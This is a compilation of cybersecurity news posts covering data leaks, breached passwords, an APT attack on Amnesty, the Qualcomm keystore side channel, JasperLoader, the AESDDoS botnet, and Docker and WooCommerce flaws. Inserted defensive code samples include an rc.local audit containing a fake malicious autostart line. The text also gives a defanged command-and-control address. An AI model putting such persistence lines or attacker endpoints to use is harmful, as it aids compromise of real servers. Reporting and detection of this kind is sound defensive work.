This scenario is just the tip of the iceberg. Addresses can easily lead to phone numbers, making people easy targets for phishing scams. Dates of birth and postal codes are common answers to security questions. And longitude and latitude mean your home can be pinpointed and watched.

Of course, there are ways to stay safe online and in the real world. For example, secure your home with alarms, and your internet connection with a top-rated VPN. This will help keep you safe, wherever you are.

How We Discovered the Leak

The research team is currently undertaking a huge web mapping project. They use port scanning to examine known IP blocks. This reveals open holes in web systems, which they then examine for weaknesses and data leaks.

Usually, the researchers can tell where a leak is coming from and then examine the database to confirm its owner.

We then reach out to the database’s owner to report the leak, and where possible, alert the people affected. This helps build a safer and more protected internet.

Although we investigated the database online, we didn’t download it. Our researchers felt that downloading it would be an ethical breach, as they would then illegally own personally identifiable data sets without peoples’ consent.

Why This Data Breach is Different

This time, it’s different. The database that the team discovered includes identifying information for more than 80 million households across the United States. As most households include more than one resident, the database could directly impact hundreds of millions of individuals.

vpnMentor is calling on the public to help identify the database and close the leak.

Unlike previous leaks we’ve discovered, this time, we have no idea who this database belongs to. It’s hosted on a cloud server, which means the IP address associated with it is not necessarily connected to its owner.

The data includes uniform entries for more than 80 million households, making it almost impossible to narrow down. The only clue we found lay in people’s ages: despite searching thousands of entries, we could not find anyone listed under the age of 40.

Interestingly, a value for people’s income is given (however, we don’t know if it’s a code for an internal ranking system, a tax bracket, or an actual amount).

This made us suspect that the database is owned by an insurance, healthcare, or mortgage company. However, information one may expect to find in a database owned by brokers or banks is missing. For example, there are no policy or account numbers, social security numbers, or payment types.

Help Us Identify this Database

We want to contact this database’s owners and let them know that their data logs are exposing millions of households.

Help us solve the riddle:

What service is used by 80 million homes across the US – but only the US – and only by people over 40? What service would collect your homeowner status and dwelling type but not your social security number? And what service records that you’re married but not how many children you have?

If you can help us identify this database or know who owns it, please contact us at info@vpnmentor.com. The 80 million families listed here deserve privacy, and we need your help to protect it.


About the author: VPNmentor

The original report is available on the VPNmentor website:
https://www.vpnmentor.com/blog/report-millions-homes-exposed/

Pierluigi Paganini

(SecurityAffairs – US Households, Data leak)

The post Report: Unknown Data Breach Exposes 80 Million US Households appeared first on Security Affairs.

Over 23 million breached accounts were using ‘123456’ as password

A cyber survey conducted by the United Kingdom’s National Cyber Security Centre (NCSC) revealed that ‘123456’ is still the most hacked password.

Security experts at the United Kingdom’s National Cyber Security Centre (NCSC) analyzed the 100,000 most-commonly re-occurring breached passwords using data from Have I Been Pwned (HIBP).

Have I Been Pwned allows users to search across multiple data breaches to see if their email address has been compromised.

The NCSC discovered that 23.2 million user accounts worldwide were using ‘123456’ as password, while 7.7 million users were using ‘123456789’.

This data is disconcerting and shows how far we are from secure habits, even though security experts continue to warn users about the risks of weak passwords.

Of course, the list of most-hacked passwords also includes other trivial choices such as ‘qwerty’, ‘password’ and ‘1111111’ in the top five, a gift for attackers.

The list of top breached passwords includes names, musicians, football team names, and fictional characters.

“The NCSC has also today published separate analysis of the 100,000 most commonly re-occurring passwords that have been accessed by third parties in global cyber breaches.” reads the post published by the NCSC.

“The results show a huge number of regularly used passwords breached to access sensitive information.”

top breached passwords

The NCSC data is aligned with findings from similar studies conducted by security firms. In December, SplashData published its worst-passwords list for the eighth year in a row, an annual report based on the analysis of more than 5 million leaked passwords. Below is the 2018 top 10 published by SplashData:

  1. 123456
  2. password 
  3. 123456789
  4. 12345678
  5. 12345
  6. 111111
  7. 1234567 
  8. sunshine
  9. qwerty
  10. iloveyou

Experts recommend strong passwords and a unique password for every service. Passwords should contain at least 8 characters, upper and lower case letters, numbers, and symbols (e.g. %$#!), although length and uniqueness matter far more than forced character classes. Another good practice is to set up multi-factor authentication wherever possible.
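The NCSC analysis was built on Have I Been Pwned data, and HIBP also exposes the same breached-password corpus to applications so that a sign-up form can refuse a password that has already leaked. The following is an added example, not NCSC's or HIBP's code: it shows the k-anonymity lookup HIBP's Pwned Passwords range service uses (only the first 5 hex characters of the SHA-1 leave the client, and the client compares the remaining 35 locally) together with a local check against the top-10 list above. The network call is replaced by a constructed offline stand-in; the 23.2 million count for ‘123456’ is the NCSC figure, the other counts are made up.

```python
import hashlib

# Local blocklist: the 2018 SplashData top 10 quoted above.
LOCAL_BLOCKLIST = {"123456", "password", "123456789", "12345678", "12345",
                   "111111", "1234567", "sunshine", "qwerty", "iloveyou"}


def split_for_range_query(password):
    """SHA-1 the password and split into the 5-hex-char prefix that is sent
    to the service and the 35-char suffix that never leaves the client."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def parse_range_response(text):
    """Parse 'SUFFIX:COUNT' lines into {suffix: count}."""
    counts = {}
    for line in text.splitlines():
        suffix, sep, count = line.strip().partition(":")
        if sep and suffix:
            counts[suffix.upper()] = int(count)
    return counts


def breach_count(password, range_lookup):
    """range_lookup(prefix) returns the response text for that 5-char prefix.
    The server never learns the full hash, only which bucket was requested."""
    prefix, suffix = split_for_range_query(password)
    return parse_range_response(range_lookup(prefix)).get(suffix, 0)


# Constructed stand-in for the range service, keyed by prefix. Real responses
# contain hundreds of suffixes per bucket; these are trimmed to a few lines.
_OFFLINE_RANGES = {
    "7C4A8": "D09CA3762AF61E59520943DC26494F8941B:23200000\n"   # sha1('123456')
             "D0A1B2C3D4E5F60718293A4B5C6D7E8F901:3\n",          # filler
    "5BAA6": "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3700000\n",    # sha1('password'), made-up count
}


def offline_range_lookup(prefix):
    return _OFFLINE_RANGES.get(prefix, "0" * 34 + "A:1\n")


def assess_password(password, range_lookup=offline_range_lookup, min_len=8):
    """Return the list of reasons to reject the password; empty means acceptable."""
    problems = []
    if len(password) < min_len:
        problems.append(f"shorter than {min_len} characters")
    if password.lower() in LOCAL_BLOCKLIST:
        problems.append("on the local list of most common passwords")
    seen = breach_count(password, range_lookup)
    if seen:
        problems.append(f"appeared {seen} times in known breaches")
    return problems


if __name__ == "__main__":
    for candidate in ("123456", "password", "tulip-granite-kettle-47"):
        print(candidate, "->", assess_password(candidate) or "ok")
```

To use the live service, `offline_range_lookup` is replaced by an HTTP GET of the prefix against the Pwned Passwords range endpoint; everything else, including the privacy property that the server only sees the prefix, stays the same. The local blocklist is kept because it works even when the service is unreachable and catches the handful of passwords that make up most of the 23 million hits.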

Below are the key findings of the survey:

  • Only 15% say they know a great deal about how to protect themselves from harmful activity
  • The most regular concern is money being stolen – with 42% feeling it likely to happen by 2021
  • 89% use the internet to make online purchases – with 39% on a weekly basis 
  • One in three rely to some extent on friends and family for help on cyber security
  • Young people more likely to be privacy conscious and careful of what details they share online
  • 61% of internet users check social media daily, but 21% report they never look at social media
  • 70% always use PINs and passwords for smart phones and tablets
  • Less than half do not always use a strong, separate password for their main email account

“We understand that cyber security can feel daunting to a lot of people, but the NCSC has published lots of easily applicable advice to make you much less vulnerable.” said Dr Ian Levy, NCSC Technical Director.

“Password re-use is a major risk that can be avoided – nobody should protect sensitive data with something that can be guessed, like their first name, local football team or favourite band.”

“Using hard-to-guess passwords is a strong first step and we recommend combining three random but memorable words. Be creative and use words memorable to you, so people can’t guess your password.”

Pierluigi Paganini

(SecurityAffairs – Top breached passwords, hacking)

The post Over 23 million breached accounts were using ‘123456’ as password appeared first on Security Affairs.

Amnesty International Hong Kong Office hit by state-sponsored attack

The Hong Kong office of Amnesty International has been hit by a long-running cyberattack carried out by China-linked hackers.

Amnesty International’s Hong Kong office has been hit with a cyberattack launched by China-linked hackers.

“This sophisticated cyber-attack underscores the dangers posed by state-sponsored hacking and the need to be ever vigilant to the risk of such attacks. We refuse to be intimidated by this outrageous attempt to harvest information and obstruct our human rights work,” said Man-kei Tam, Director of Amnesty International Hong Kong.

An Amnesty International spokesperson told the South China Morning Post that supporters’ names, Hong Kong identity card numbers and personal contact information were accessed by the hackers; no financial data was compromised.

In response to the cyber attack, the organization set up a “global task force composed of cyber security professionals.”

The organization discovered the security breach on March 15 during a scheduled migration of the Hong Kong office IT infrastructure to its international network.

“The initial findings reveal the attacks were perpetrated using tools and techniques associated with specific advanced persistent threat groups (APTs).” reads the announcement published by Amnesty International. “Cyber forensic experts were able to establish links between the infrastructure used in this attack and previously reported APT campaigns associated with the Chinese government.”

amnesty international

The organization has notified everyone who might have been affected by the attack and is providing additional guidance to further ensure their data is secure. Amnesty also reported the attack to Hong Kong’s Office of the Privacy Commissioner for Personal Data.

According to Amnesty International, Chinese authorities are hindering cooperation between international and domestic NGOs.

The group attributed the attack to “a known APT group” that used “tactics, techniques and procedures consistent with a well developed adversary”.

The investigation is still ongoing to determine the extent of the hack and the window of exposure, but experts fear the attack may have been underway for a few years.

Amnesty is a privileged target for state-sponsored hackers because of its activity with other NGOs, journalists, activists, and civil rights movements worldwide. 

In August 2018, Amnesty International revealed that one of its employees had been targeted with surveillance malware developed by an Israeli firm.

The human rights group published a report that provides details on the attack against its employee. 

Pierluigi Paganini

(SecurityAffairs – APT, Amnesty International)

The post Amnesty International Hong Kong Office hit by state-sponsored attack appeared first on Security Affairs.

Microsoft removes Password-Expiration Policy in security baseline for Windows 10

Microsoft presented a series of security enhancements for its Windows 10, including the removal of the password-expiration policy. 

Microsoft announced the removal of the password-expiration policy from its operating system starting with the next Windows 10 feature update (Windows 10 version 1903, a.k.a., “19H1” ) and Windows Server version 1903.

The reasoning behind the change is that password expiration only helps if a password has been stolen; if a password is never compromised, forcing it to expire worsens the user experience without improving security.

“Periodic password expiration is a defense only against the probability that a password (or hash) will be stolen during its validity interval and will be used by an unauthorized entity. If a password is never stolen, there’s no need to expire it.” reads the post published by Microsoft. “And if you have evidence that a password has been stolen, you would presumably act immediately rather than wait for expiration to fix the problem.”

An organization can protect users against stolen passwords by choosing alternative security policies instead of a password-expiration policy, for example by enforcing multi-factor authentication.

“Periodic password expiration is an ancient and obsolete mitigation of very low value, and we don’t believe it’s worthwhile for our baseline to enforce any specific value.” continues the post. “By removing it from our baseline rather than recommending a particular value or no expiration, organizations can choose whatever best suits their perceived needs without contradicting our guidance,”

The proposed Windows-10-1903-Security-Baseline-DRAFT also drops the enforced disabling of the built-in Administrator and Guest accounts; the baseline no longer mandates that setting, although both accounts remain disabled by default in Windows.

It also recommends that where a local administrative account is enabled, only one such account be in use and that it have a strong password.

If you are interested in the other changes proposed by Microsoft, give the draft a look.

Pierluigi Paganini

(SecurityAffairs – Microsoft, password-expiration policy)

The post Microsoft removes Password-Expiration Policy in security baseline for Windows 10 appeared first on Security Affairs.

Critical flaw in Qualcomm chips exposes sensitive data for Android Devices

Researchers devised a new side-channel attack in Qualcomm technology, widely used by most Android smartphones, that could expose private keys.

Researchers have uncovered a new side-channel attack that could be exploited to extract sensitive data, including private keys and passwords, from the Qualcomm secure keystore. The attack potentially impacts most modern Android devices that use Qualcomm chips, including the popular Snapdragon 820, 835, 845 and 855 models.

The attack leverages a flaw in the Qualcomm Secure Execution Environment (QSEE), designed to securely store cryptographic keys on devices.

“A side-channel attack can extract private keys from certain versions of Qualcomm’s secure keystore. Recent Android devices include a hardware-backed keystore, which developers can use to protect their cryptographic keys with secure hardware.” reads a blog post published by NCC Group. “On some devices, Qualcomm’s TrustZone-based keystore leaks sensitive information through the branch predictor and memory caches, enabling recovery of 224 and 256-bit ECDSA keys.”


According to NCC Group, hardware-backed keystores rely on ARM TrustZone to protect sensitive data: on many devices it splits execution into a secure world (which handles sensitive data) and a normal world (where the Android OS processes run).

Experts pointed out that the two worlds have the same underlying microarchitectural structures, meaning an attacker could carry out a side-channel attack to access protected memory.

The experts used a memory cache analyzer called Cachegrab to carry out side-channel attacks on TrustZone.

The experts tested a rooted Nexus 5X device based on the Qualcomm Snapdragon 808 and discovered that QSEE leaked data that could be used to recover 256-bit ECDSA keys.

The attacker must have root access to the device to launch the attack.
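To make the branch-predictor leak mentioned by NCC Group concrete, here is an added illustration (not the researchers’ code, and not Qualcomm’s keystore implementation): modular exponentiation stands in for ECDSA scalar multiplication, since it has the same double-and-add structure. The first routine branches on each secret bit, so the sequence of operations it performs spells out the secret; the second is a Montgomery ladder that performs the same two operations for every bit and selects registers with a mask instead of an “if”. Each routine records its operations in a trace, which is the kind of information a branch-predictor or cache probe can observe.

```python
"""Secret-dependent branching versus a constant-time ladder.  Added
illustration, not NCC Group's research code or Qualcomm's keystore code.
Modular exponentiation in (Z/pZ)* stands in for ECDSA scalar multiplication
(same double-and-add structure, simpler arithmetic).  Each routine appends
the operation it performs to a trace; the trace models what a
branch-predictor or cache side channel observes."""

P = 2**61 - 1          # a Mersenne prime; the toy group is (Z/PZ)*


def leaky_square_and_multiply(base, exp, trace):
    """Left-to-right square-and-multiply with a branch on every secret bit.
    'M' runs only for 1 bits, so the trace spells out the exponent."""
    acc = 1
    for bit in bin(exp)[2:]:
        acc = acc * acc % P
        trace.append("S")
        if bit == "1":                 # secret-dependent branch
            acc = acc * base % P
            trace.append("M")
    return acc


def ct_swap(flag, a, b):
    """Swap a and b when flag == 1, using masks instead of a branch."""
    mask = -flag                       # 0 -> 0, 1 -> -1 (all bits set)
    t = (a ^ b) & mask
    return a ^ t, b ^ t


def ct_ladder(base, exp, nbits, trace):
    """Montgomery ladder: exactly one 'M' and one 'S' per bit, whatever the
    bit is.  The bit only decides which register receives which result,
    and that choice is made with ct_swap rather than an if."""
    r0, r1 = 1, base % P
    for i in range(nbits - 1, -1, -1):
        bit = (exp >> i) & 1
        r0, r1 = ct_swap(bit, r0, r1)
        r1 = r0 * r1 % P
        trace.append("M")
        r0 = r0 * r0 % P
        trace.append("S")
        r0, r1 = ct_swap(bit, r0, r1)
    return r0


def compare(secret, base=5):
    """Return the (leaky, constant-time) operation traces for one secret,
    after checking both routines compute the right value."""
    leaky, ct = [], []
    assert leaky_square_and_multiply(base, secret, leaky) == pow(base, secret, P)
    assert ct_ladder(base, secret, secret.bit_length(), ct) == pow(base, secret, P)
    return "".join(leaky), "".join(ct)


if __name__ == "__main__":
    for s in (0b1011, 0b1000, 0b1111):
        leaky, ct = compare(s)
        print(f"secret={s:04b}  leaky={leaky:<8}  ladder={ct}")
```

For secrets of the same bit length the ladder’s trace is identical, while the leaky trace differs for every secret. Two caveats apply when reading this as a model of the real attack: Python’s big-integer arithmetic is itself data-dependent, so only the operation sequence is constant-time here, and a production ECDSA implementation also needs constant-time field arithmetic and memory access patterns (the cache side of the leak NCC Group describes), not just branch-free control flow.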

Qualcomm has released a security patch to address the flaw, tracked as CVE-2018-11976, and the fix was included in the April Android security update.

Below is the disclosure timeline for the flaw:

  • March 19, 2018: Contact Qualcomm Product Security with issue; receive confirmation of receipt
  • April, 2018: Request update on analysis of issue
  • May, 2018: Qualcomm confirms the issue and begins working on a fix
  • July, 2018: Request update on the fix; Qualcomm responds that the fix is undergoing internal review
  • November, 2018: Request update on the timeline for disclosure; Qualcomm responds that customers have been notified in October, beginning a six-month carrier recertification process. Agree to April 2019 disclosure date.
  • March, 2019: Discuss publication plans for April 23
  • April, 2019: Share draft of paper with Qualcomm
  • April 23, 2019: Public Disclosure

“Providing technologies that support robust security and privacy is a priority for Qualcomm,” a Qualcomm spokesperson told Threatpost. “We commend the NCC Group for using responsible disclosure practices surrounding their security research. Qualcomm Technologies issued fixes to OEMs late last year, and we encourage end users to update their devices as patches become available from OEMs.”

Technical details of the vulnerability are available in the paper published by the experts.


Signed Malspam campaigns hit Europeans with Multi-Stage JasperLoader

Experts observed several malspam campaigns using signed emails to deliver the GootKit banking Trojan (aka talalpek or Xswkit).

Threat actors have been leveraging a multi-stage malware loader tracked as JasperLoader in malspam campaigns over the past few months.

The JasperLoader was observed while distributing malware to targets from Central Europe, most of them in Italy and Germany.

The Gootkit banking Trojan was previously distributed by DanaBot, the Neutrino exploit kit, and Emotet.

“Specifically, we’re tracking a loader known as “JasperLoader,” which has been increasingly active over the past few months and is currently being distributed via malicious spam campaigns primarily targeting central European countries with a particular focus on Germany and Italy.” reads the analysis published by Cisco Talos. “JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult.”

The JasperLoader loader uses a multi-stage infection process that implements several obfuscation techniques to avoid detection. According to Cisco Talos experts, the JasperLoader loader was designed with resiliency and flexibility in mind.

The malspam campaigns detected by Cisco Talos that hit European countries use weaponized attachments containing either a VBScript (VBS) file or a DOCM document with VBA macros.


Talos experts also noticed spam messages containing malicious JS downloaders.

The latest malspam campaigns observed by Talos use message signing to confirm the authenticity of the sender.

“Talos has identified several malicious campaigns making use of this type of message signing as a way to lend credibility to their messages and maximize the likelihood that potential victims will open the malicious attachments.” continues the analysis of the researchers.

The campaigns that targeted Italian users leverage legitimate certified email services such as Posta Elettronica Certificata (PEC).

“The choice to abuse certified email services such as PEC demonstrates that as attackers are always looking for new ways to lend credibility to their social engineering attacks.” continues Cisco Talos.

“In this case, abusing a legitimate email service allowed them to deliver their malicious emails in a way that would maximize the likelihood that a potential victim would open the attachments and infect themselves with JasperLoader.”

JasperLoader checks the target’s geolocation to determine whether the machine is located in one of a specific set of countries (Russia, Ukraine, Belarus, or the People’s Republic of China).

Experts observed that the malware gains persistence by adding an LNK shortcut pointing to itself to the Startup folder, so that it is launched every time the system reboots.

Threat actors use JasperLoader to update the loader, run PowerShell scripts and, of course, deliver the final Gootkit payload.

Further technical details, such as Indicators of compromise (IOCs), are included in the analysis published by Talos.


Security Affairs newsletter Round 211 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.


Once again thank you!

60 Million records of LinkedIn users exposed online
INPIVX hidden service, a new way to organize ransomware attacks
Ride-Hailing Company operating in Iran exposes data of Iranian Drivers
A flaw in Shopify API flaw exposed revenue and traffic data of thousands of stores
Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT
jQuery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites
Russian Twitter bot activity increased in the wake Mueller report release
Bodybuilding.com forces password reset after a security breach
EmCare reveals patient and employee data were hacked
FireEye experts found source code for CARBANAK malware on VirusTotal
Iran-linked APT34: Analyzing the webmask project
Targeted Attacks hit multiple embassies with Trojanized TeamViewer
Kaspersky speculates the involvement of ShadowPad attackers in Operation ShadowHammer
OilRig APT uses Karkoff malware along with DNSpionage in recent attacks
Stuart City is the new victim of the Ryuk Ransomware
The Russian Shadow in Eastern Europe: Gamaredon ‘s Ukrainian MOD Campaign
Zero-day vulnerability in Oracle WebLogic
A flaw in Rockwell Controller allows attackers to redirect users to malicious Sites
Britain ‘Approves Huawei role in building ‘non-core parts for 5G Network
Crooks abuse GitHub platform to host phishing kits
Flaws in Social Warfare plugin actively exploited in the wild
Beapy Cryptojacking campaign leverages EternalBlue exploit to spread
Millions of IoT Devices exposed to remote hacks due to iLnkP2P flaws
The strengths and weaknesses of different VPN protocols
Cisco discovered several flaws in Sierra Wireless AirLink ES450 devices
Docker Hub Database hacked, 190,000 users impacted
Experts release PoC exploit for unpatched flaw in WordPress WooCommerce Extension
Magecart skimmer scripts hosted on GitHub infected 200+ e-commerce sites


AESDDoS bot exploits CVE-2019-3396 flaw to hit Atlassian Confluence Server

A new variant of the AESDDoS bot is exploiting a recent vulnerability in the Atlassian collaborative software Confluence.

Security experts at Trend Micro have spotted a new variant of the AESDDoS bot that exploits a recently discovered vulnerability in the Atlassian collaboration software Confluence.

The flaw exploited in the attacks, tracked as CVE-2019-3396, is a server-side template injection vulnerability that resides in the Widget Connector macro in Confluence Server.

Threat actors leverage the vulnerability to install distributed denial-of-service (DDoS) malware and cryptocurrency miners, and to remotely execute code.

“In our analysis, we saw that an attacker was able to exploit CVE-2019-3396 to infect machines with the AESDDoS botnet malware.” reads the analysis published by Trend Micro. “A shell command was remotely executed to download and execute a malicious shell script (Trojan.SH.LODEX.J), which in turn downloaded another shell script (Trojan.SH.DOGOLOAD.J) that finally installed the AESDDoS botnet malware on the affected system.”

The AESDDoS bot involved in the recent attacks has the ability to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The malware also connects to 23[.]224[.]59[.]34:48080 to send and receive remote shell commands from the attacker.

Once the malware has infected a system, it can gather system information, including model ID and CPU description, speed, family, model, and type.

The AESDDoS bot uses the AES algorithm to encrypt gathered data and data received from the C2 server.

Trend Micro researchers also discovered that the latest variant of the AESDDoS bot modifies the files /etc/rc.local and /etc/rc.d/rc.local as an autostart technique, appending a “{malware path}/{malware file name} reboot” command to them.
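The autostart technique above leaves a visible trace in two well-known files, which makes it cheap to check for. The Python script below is an added example (not Trend Micro’s tooling): it scans the content of rc.local for launch lines that point into user-writable or hidden directories, that match the “<path> reboot” form described above, or that sit after an “exit 0” (a sign the file was appended to blindly). The file paths come from the analysis; the sample file content is constructed.

```python
"""Audit the rc.local autostart files for appended launch lines of the kind
AESDDoS adds.  Added example, not Trend Micro's tooling.  The file paths and
the '<malware path> reboot' pattern come from the analysis above; the sample
file content is constructed."""
import os
import re
import shlex

RC_FILES = ("/etc/rc.local", "/etc/rc.d/rc.local")

# Directories from which an init script has no business launching binaries.
WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/home", "/root")

SAMPLE_RC_LOCAL = """\
#!/bin/sh -e
# rc.local: executed at the end of each multiuser runlevel
/usr/sbin/ntpdate -u pool.ntp.org
exit 0
/tmp/.cache/kworkerds reboot
"""


def audit_rc_local(text):
    """Return [(line_no, line, reason)] for lines that look like an
    unauthorized autostart entry."""
    findings = []
    after_exit = False
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"exit\b", line):
            after_exit = True
            continue
        try:
            argv = shlex.split(line)
        except ValueError:
            findings.append((no, line, "unparseable shell line"))
            continue
        if not argv:
            continue
        prog = argv[0]
        reasons = []
        if prog.startswith(tuple(d + "/" for d in WRITABLE_DIRS)):
            reasons.append("program lives in a user-writable directory")
        if any(part.startswith(".") for part in prog.split("/") if part):
            reasons.append("program path contains a hidden component")
        if argv[1:] == ["reboot"]:
            reasons.append("matches the '<path> reboot' AESDDoS autostart form")
        if after_exit:
            reasons.append("appended after 'exit 0' (never runs, but shows tampering)")
        if reasons:
            findings.append((no, line, "; ".join(reasons)))
    return findings


def audit_system(paths=RC_FILES):
    """Audit the real files on this host; missing files are skipped."""
    report = {}
    for path in paths:
        if os.path.isfile(path):
            with open(path, errors="replace") as f:
                report[path] = audit_rc_local(f.read())
    return report


if __name__ == "__main__":
    for no, line, why in audit_rc_local(SAMPLE_RC_LOCAL):
        print(f"line {no}: {line!r}: {why}")
    for path, findings in audit_system().items():
        print(path, "clean" if not findings else findings)
```

audit_system() reads the two real files when they exist, so the script can run as a periodic integrity check alongside file-hash monitoring of the same paths; a line appended after “exit 0” never executes, but it is still the clearest evidence that something wrote to the file.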

Atlassian has already addressed the vulnerability in Confluence with the release of version 6.15.1.

“Since the successful exploitation of CVE-2019-3396 in Atlassian Confluence Server can put resources at risk, enterprises should be able to identify vulnerabilities, make use of the latest threat intelligence against malware or exploits, and detect modifications to the application’s design and the underlying infrastructure that hosts it,” Trend Micro concludes.


NIST ACTS Toolkit could find bugs in safety-critical systems

US NIST has updated its Automated Combinatorial Testing for Software (ACTS) research toolkit, which should help experts find bugs in complex safety-critical applications.

US NIST announced updates to its Automated Combinatorial Testing for Software (ACTS) research toolkit that should let developers easily spot software errors in complex safety-critical applications.

The ACTS toolkit lets development teams check that their products respond correctly to combinations of simultaneous inputs that could trigger security vulnerabilities.

The toolkit, developed by researchers from NIST along with the University of Texas at Arlington, Adobe, and SBA Research, the research center for information security in Austria, is particularly useful for testing large and complex systems with thousands of input variables.

The NIST announced that the ACTS toolkit now includes an updated version of Combinatorial Coverage Measurement (CCM), a tool that should help improve safety as well as reduce software costs.

The improvements should help developers to improve the safety of their systems and to reduce development costs.

“Before we revised CCM, it was difficult to test software that handled thousands of variables thoroughly,” wrote NIST mathematician Raghu Kacker. “That limitation is a problem for complex modern software of the sort that is used in passenger airliners and nuclear power plants, because it’s not just highly configurable, it’s also life critical. People’s lives and health are depending on it.”


The earlier version of the NIST tool could handle software with a few hundred input variables. Another tool, developed by SBA Research, can analyze software with up to 2,000 input variables and generate a test suite covering up to five-way combinations of those variables.
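The quantity CCM reports is t-way combinatorial coverage: the share of all combinations of t parameter values that at least one test in the suite exercises. As an added example (it implements the textbook definition and is not NIST’s ACTS/CCM code), the script below measures 1-, 2- and 3-way coverage of a constructed test suite for a hypothetical login service, lists the combinations no test covers, and greedily proposes the single additional test that would close the most gaps, which is how covering-array generators like the SBA Research algorithm extend a suite.

```python
"""t-way combinatorial coverage measurement, the quantity NIST's CCM tool
reports.  Added example implementing the textbook definition (share of all
t-way parameter-value combinations that at least one test covers); it is not
NIST's ACTS/CCM code.  The parameters and test suite are constructed."""
from itertools import combinations, product

# Constructed model: a hypothetical login service and the values each input
# can take.
PARAMETERS = {
    "protocol": ["tls1.2", "tls1.3"],
    "auth": ["password", "mfa", "sso"],
    "client": ["web", "mobile"],
}

# Constructed test suite: each test assigns one value to every parameter.
TESTS = [
    {"protocol": "tls1.2", "auth": "password", "client": "web"},
    {"protocol": "tls1.3", "auth": "mfa", "client": "mobile"},
    {"protocol": "tls1.3", "auth": "sso", "client": "web"},
    {"protocol": "tls1.2", "auth": "mfa", "client": "web"},
]


def all_combinations(params, t):
    """Every t-way combination of (parameter, value) pairs the model allows."""
    combos = set()
    for names in combinations(sorted(params), t):
        for values in product(*(params[n] for n in names)):
            combos.add(tuple(zip(names, values)))
    return combos


def combinations_of_test(test, t):
    """The t-way combinations a single test exercises."""
    return {tuple((n, test[n]) for n in names)
            for names in combinations(sorted(test), t)}


def coverage(tests, params, t):
    """Return (covered fraction, sorted list of uncovered combinations)."""
    universe = all_combinations(params, t)
    covered = set().union(*(combinations_of_test(x, t) for x in tests)) & universe
    return len(covered) / len(universe), sorted(universe - covered)


def suggest_test(tests, params, t):
    """Greedy step: the one additional test that covers the most still-missing
    t-way combinations, and how many it covers."""
    _, missing = coverage(tests, params, t)
    missing = set(missing)
    names = sorted(params)
    best, best_gain = None, -1
    for values in product(*(params[n] for n in names)):
        candidate = dict(zip(names, values))
        gain = len(combinations_of_test(candidate, t) & missing)
        if gain > best_gain:
            best, best_gain = candidate, gain
    return best, best_gain


if __name__ == "__main__":
    for t in (1, 2, 3):
        frac, missing = coverage(TESTS, PARAMETERS, t)
        print(f"{t}-way coverage: {frac:.1%}, {len(missing)} combinations uncovered")
    print("next test to add:", suggest_test(TESTS, PARAMETERS, 2))
```

On the sample suite every single value is exercised (100% 1-way coverage) while only 11 of the 16 value pairs are, which is the gap combinatorial testing targets: interaction faults that no single-parameter test reveals. The enumeration in suggest_test is exhaustive over the input space and is fine for a handful of parameters; the thousands of variables the NIST announcement mentions are exactly why the SBA Research algorithm is needed.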

“The two tools can be used in a complementary fashion: While the NIST software can measure the coverage of input combinations, the SBA algorithm can extend coverage to thousands of variables.” added Kacker.

Although the SBA Research algorithm has not yet been integrated into the ACTS toolkit, the team plans to include it in the future. In the meantime, NIST will make the algorithm available to any developer who requests it.


Docker Hub Database hacked, 190,000 users impacted

Docker became aware of unauthorized access to a Docker Hub database that exposed sensitive information for roughly 190,000 users.

Docker notified its users that an unauthorized entity gained access to a Docker Hub database that exposed sensitive information for roughly 190,000 users.

The exposed information included some usernames and hashed passwords, as well as tokens for GitHub and Bitbucket repositories. The tokens allow development teams to automatically rebuild their images on Docker Hub.

Depending on the permissions the token carries, its exposure could allow an attacker to modify an image and trigger its rebuild, a typical supply-chain attack scenario.

Docker was informed of the unauthorized access to a Hub database on April 25th, 2019.

“On Thursday, April 25th, 2019, we discovered unauthorized access to a single Hub database storing a subset of non-financial user data. Upon discovery, we acted quickly to intervene and secure the site.” reads the data breach notice sent to the impacted users via email.

“During a brief period of unauthorized access to a Hub database, sensitive data from approximately 190,000 accounts may have been exposed (less than 5% of Hub users). Data includes usernames and hashed passwords for a small percentage of these users, as well as Github and Bitbucket tokens for Docker autobuilds.”


The company confirmed that it has already revoked all the exposed tokens and access keys.

“It is important for developers who used Docker Hub autobuild to check their project’s repositories for unauthorized access.” reads a blog post published by BleepingComputer, which first reported the news. “Even worse, with these notices coming late on a Friday night, developers potentially have a long night ahead of them as they assess their code.”

The text of the data breach notification is available here:

https://news.ycombinator.com/item?id=19763413

Docker Hub maintainers are asking users to change their password on Docker Hub and on any other account that shares the same credentials.


Experts release PoC exploit for unpatched flaw in WordPress WooCommerce Extension

WordPress-based eCommerce websites using the WooCommerce plugin are at risk of full compromise due to an unpatched vulnerability.

A WordPress security firm called ‘Plugin Vulnerabilities’ has discovered a critical vulnerability in a WooCommerce plugin that exposes WordPress-based eCommerce websites to compromise.

The vulnerability affects the WooCommerce Checkout Manager plugin that allows owners of e-commerce websites based on WordPress and running the WooCommerce plugin to customize forms on their checkout pages.

The experts discovered an “arbitrary file upload” vulnerability that can be exploited by unauthenticated, remote attackers when the “Categorize Uploaded Files” option is enabled in the WooCommerce Checkout Manager plugin settings.

Currently the plugin is used by more than 60,000 websites.

The company decided to publish the details of the flaw and a proof-of-concept exploit in protest against the moderators of the WordPress Support forum. It says that over the years it has tried to report vulnerabilities directly through the forum without success, because moderators have systematically removed its posts warning the community.

The company is focused on discovering vulnerabilities in popular and widely adopted WordPress plugins.

Analyzing the code, the experts found that at line 2084 of the ‘includes/admin.php’ file the application moves uploaded files into a directory using ‘move_uploaded_file’ without first checking that the file type is allowed.

The vulnerability could be exploited by attackers to execute arbitrary server-side script code in the context of the web server process and compromise the application to access or modify data or gain administrative access.

“If that is enabled then the following code will be used, which allows arbitrary files to be uploaded: ” wrote the experts.


“So a hacker could use that to upload malicious .php files at a location they could then access, as the proof of concept below shows.”

The proof-of-concept request released by the experts is shown in their post.

Even the latest WooCommerce Checkout Manager version 4.2.6 is affected by the flaw.

